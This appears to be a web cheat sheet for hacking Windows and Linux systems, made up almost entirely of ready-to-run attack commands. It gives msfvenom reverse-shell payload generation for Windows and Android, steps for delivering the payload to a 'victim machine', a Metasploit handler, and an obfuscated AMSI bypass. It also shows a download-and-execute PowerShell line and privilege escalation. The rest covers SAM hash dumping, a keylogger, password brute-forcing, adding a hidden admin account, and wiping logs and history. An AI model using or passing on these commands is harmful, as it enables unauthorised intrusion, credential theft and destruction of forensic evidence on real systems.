Systemhacking - readloud.org

System hacking cheat sheet

Getting shell with msfvenom and use PowerUp.ps1 to escalate privileges

Generate payload and encode using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP Address of Host Machine] LPORT=[Port in the Host Machine] -o [Output Path/shellcode.exe]

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[IP Address of Host Machine] -f exe > Desktop/Backdoor.exe

msfvenom documentation

Upload shellcode using a local server

mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp [PATH]/shellcode.exe /var/www/html/share

service apache2 start

Download it to the victim machine [IP Address of Host Machine]/share/shellcode.exe.

Using handler in metasploit to connect to the payload

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST [IP Address of Host Machine]
set LPORT [Port in the Host Machine]
exploit

Upload PowerUp.ps1

upload [PATH]/PowerUp.ps1 PowerUp.ps1

PowerUp.ps1

Check all vulnerabilities

shell
poweshell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

PowerUp.ps1 tutorial

bypass is used to bypass PowerShell’s execution policy.

For disable AMSI:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Excute PowerUp.ps1 without upload the script

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1'); Invoke-AllChecks"

Escalate privileges

Invoke-ServiceAbuse -Name 'Name of the vulnerable service'

Attemp to bypass Windows UAC protection via the FodHelper Registry Key usind bypassuac_fodhelper exploit

use exploit/windows/local/bypassuac_fodhelper

If it works, in some cases we can already escalate privileges with some techniques like getsystem.

Attemp to elevate privileges with Meterpreter

getsystem -t 1

Obtain password hashes in the SAM file using Metasploit (root requiered)

run post/windows/gather/smart_hashdump

It uses the service Named Pipe Impersonation (In Memory/Admin) Technique.

Clear the events logs that require administrative or root privileges using Meterpreter (root requiered)

clearev

Clear all event viewer logs using wevtutil (Windows)

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

@echo off

FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo All Event Logs have been cleared!
goto theEnd

:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof

:noAdmin
echo Current user permissions to execute this .BAT file are inadequate.
echo This .BAT file must be run with administrative privileges.
echo Exit now, right click on this .BAT file, and select "Run as administrator".  
pause >nul

:theEnd
Exit

Securely delete a chunk of data by overwriting it to prevent its possible recovery using in-built Windows tool (Windows)

cipher /w:[Drive or Folder or File Location]

Avoid bash history

Disable the BASH shell from saving the history (Linux)

export HISTSIZE=0

Make bash history unreadable (Linux)

shred ~/.bash_history

shred ~/.bash_history && cat /dev/null > .bash_history

Leave no trace of MACE attributes when reading or modifying files using Meterpreter

To view the mace attributes of a file (Windows)

timestomp [FILE] -v

Change MACE attributes (Windows)

timestomp [FILE] -m "mm/dd/yyyy hh:mm:ss"

Kylogger using Meterpreter

Start keylogger

keyscan_start

Read keylogger log

keyscan_dump

Attempt to gain access to FTP server perform a dictionaty attack using THC Hydra

hydra -L [USERNAMES DICTIONARY] -P [PASSWORDS DICTIONARY] ftp://[IP]

Create user and set admin privilegies in Windows

net user Test /Add
net localgroup Administrators Test /Add

Generate payload for Android and encode using msfvenom

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=[LOCAL HOST] R > payload.apk